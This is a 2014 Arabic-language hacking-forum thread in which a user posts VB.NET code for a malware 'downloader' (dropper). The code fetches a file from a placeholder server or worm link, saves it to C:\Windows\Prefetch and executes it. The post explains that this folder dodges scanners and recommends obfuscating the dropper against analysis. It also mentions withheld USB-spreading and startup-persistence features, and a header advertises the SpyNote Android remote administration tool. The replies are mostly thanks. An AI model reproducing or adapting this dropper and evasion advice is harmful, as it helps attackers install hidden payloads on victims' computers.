1. SpyNote v5.0 Android Remote Administration Tool
    النسخة تعمل من API 10 الى API 25 اضافات واصلاحات عديده
    خصائص البيلدر مهمه جدا في ثبات الاتصال قرائة الموضوع

[ حل ] برمج دواندولر بنفسك لاي صيغة vb.net

الموضوع في 'حماية الأجهزة' بواسطة samo dz, بتاريخ ‏28 أكتوبر 2014.

كاتب الموضوع : samo dz المشاهدات : 552 الردود : 13 ‏28 أكتوبر 2014
حالة الموضوع:
مغلق
  1. غير متصل

    samo dz
    rankrank
    Developer

    عضو منذ:
    ‏18 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    ساطرح هدا الكود لدواندولر vb.net بحجم 12kb بعد ان تنزع الايقونة لدي برنامجي dowandoler مع خاصية usb spred و add to startup لكن لن اطرحه حتى لا يقولون ملغم لهدا بدات اضع الاكوادشرح الكود : الكود يقوم بتحميل الرابط المباشر لسيرفرك او اي شيء اخر الى الملف الدي تختاره انت اظن ان عليك ان تختار C:\Windows\Prefetch لان كاشف التلغيم لن يفكر في ملف preftch كمسار للنزول شفر الدواندولر حتى لا يمكن تحليله ب.net reflector
    يمكنك ان تضيف الكود في الفورم او الكلاس او بوتون
    كود:
     My.Computer.Network.DownloadFile("رابط المباشر للسيرفر او الدودة", "C:\Windows\Prefetch\server.exe")
            Process.Start("C:\Windows\Prefetch\server.exe")
    ادا واجهتم مشكلة في الكود اسالني
    ارجو التفييم حتى اصعد في الرتبة و افيدكم اكتر
     


    جاري تحميل الصفحة...
  2. غير متصل

    Zero Team
    rankrank
    Developer

    عضو منذ:
    ‏20 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: برمج دواندولر بنفسك لاي صيغة vb.net

    ممكن شرح مصور حبيبي
     


  3. غير متصل

    samo dz
    rankrank
    Developer

    عضو منذ:
    ‏18 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: برمج دواندولر بنفسك لاي صيغة vb.net

    هل لديك visual basic
     


  4. غير متصل

    snoopi
    rank
    Developer

    عضو منذ:
    ‏28 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: برمج دواندولر بنفسك لاي صيغة vb.net

    :{1!}: شكرا اخي العزيز على الافادة
    {1!@}​
     


  5. غير متصل

    Gaza-Dz
    مراقب عآم

    عضو منذ:
    ‏26 مايو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    113
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    DZ
    الإقامة:

    رد: برمج دواندولر بنفسك لاي صيغة vb.net

    السلام عليكم ورحمة الله
    بوركت اخي سامو
    يعطيك الصحة ​
     


  6. غير متصل

    SiL3nT M4n
    rankrank
    Developer

    عضو منذ:
    ‏19 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: برمج دواندولر بنفسك لاي صيغة vb.net

    مشكور اخي جاري التجربه {1$0}
     


  7. غير متصل

    المعاقب الصدري
    طاقم الإدارة

    عضو منذ:
    ‏20 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    681
    نقاط الجائزة:
    الجنس:
    ذكر

    رد: برمج دواندولر بنفسك لاي صيغة vb.net

    احسنت مبدع
     


  8. غير متصل

    Ameer Eagle V.I.P
    V • I • P

    عضو منذ:
    ‏7 يونيو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,777
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:

    رد: برمج دواندولر بنفسك لاي صيغة vb.net

    السلام عليكم ورحمة الله ...
    عاشت الايادي بارك الله بيك
    وبالنسبة الى البرنامج اخي لا تقلق كان هنالك سوء فهم صغير حصل ولقدد قم اصلاحه والحمد لله لهذا تابع طريقك يا غالي موفق
     


  9. غير متصل

    Mr-TiGeR
    rankrank
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏8 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:

    رد: برمج دواندولر بنفسك لاي صيغة vb.net

    يعطيكك الفف عافيةة اخوي سآموو ~

    واذا كنت زعلان علي انا اسسف جدآ

    ً#ٌ5oًًًُ.:{11}:
     


  10. غير متصل

    slaizer مشرف أختبار الأختراق
    V • I • P

    عضو منذ:
    ‏29 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    558
    نقاط الجائزة:
    الجنس:
    ذكر

    رد: برمج دواندولر بنفسك لاي صيغة vb.net

    مبدع[​IMG][​IMG][​IMG][​IMG]
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...